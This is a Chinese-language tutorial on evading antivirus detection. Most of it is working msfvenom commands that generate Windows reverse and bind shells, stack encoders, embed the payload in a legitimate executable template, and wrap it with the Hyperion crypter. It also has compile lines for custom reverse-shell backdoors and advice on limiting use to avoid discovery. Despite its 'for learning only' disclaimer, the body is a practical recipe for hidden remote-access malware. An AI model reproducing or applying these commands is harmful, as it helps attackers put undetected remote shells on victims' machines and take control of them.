仅用于学习交流
免杀是一个渗透测试中最苦恼的环节,也是一个需要学习很久的部分。
利用kali生成的木马存在的问题就是无法避免市面上大多数的杀软,及时利用kali自带的免杀也无法达到很好的免杀效果。
免杀技术
1.修改二进制文件中的特征字符
替换、擦除、修改
2.加密技术
通过加密方式使得特征字符不可读,从而逃避杀软检测
运行时分片分段的解密执行,注入进程或杀软不检查的无害文件中
3.防杀软的检测
恶意程序本身的特征字符
加密器crypter的特征字符
当前的现状
1.编写私有的RAT软件,避免普遍杀软所知的特征字符
2.使用独有crypter软件加密恶意程序
3.尽可能小范围使用,避免被发现
4.直接修改特征码(最直接的方式)
常用的RAT软件
灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore
生成反弹shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 -platform win -f exe -o a.exe
加密编码反弹shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/ countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/ shikata_ga_nai -i 9 -b ‘\x00’ -f exe -o a.exe
利用模板隐藏shell
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe
msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 -platform win -f exe > b.exe
Hyperion(32bit PE加密程序)
– Crypter / Container(解密器+PE Loader)
– https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/ Hyperion-1.2.zip
– unzip Hyperion-1.2.zip
– cd Hyperion-1.2 && i686-w64-mingw32-g++ -static-libgcc -static-libstdc++ Src/Crypter/*.cpp -o h.exe
– dpkg --add-architecture i386 && apt-get update && apt-get install wine32
– msfvenom -p windows/shell/reverse_tcp lhost=192.168.1.15 lport=4444 -platform win -e x86/shikata_ga_nai -a x86 -f exe -o a.exe
– wine h.exe a.exe b.exe
自己编写后门
Windows reverse shell – wine gcc.exe windows.c -o windows.exe -lws2_32
Linux shell – gcc linux_revers_shell.c -o linux
免杀只是一种了解杀软流程之后的应对方式,文章仅用于交流,免杀的方法很多,文中提及的只是最普及的方式,入门只需要使用免杀加密或者修改特征字符即可,kali自带的免杀效果也不错,在实验环境中进行测试已经足够。免杀只是手段,不是恶意攻击的方式。
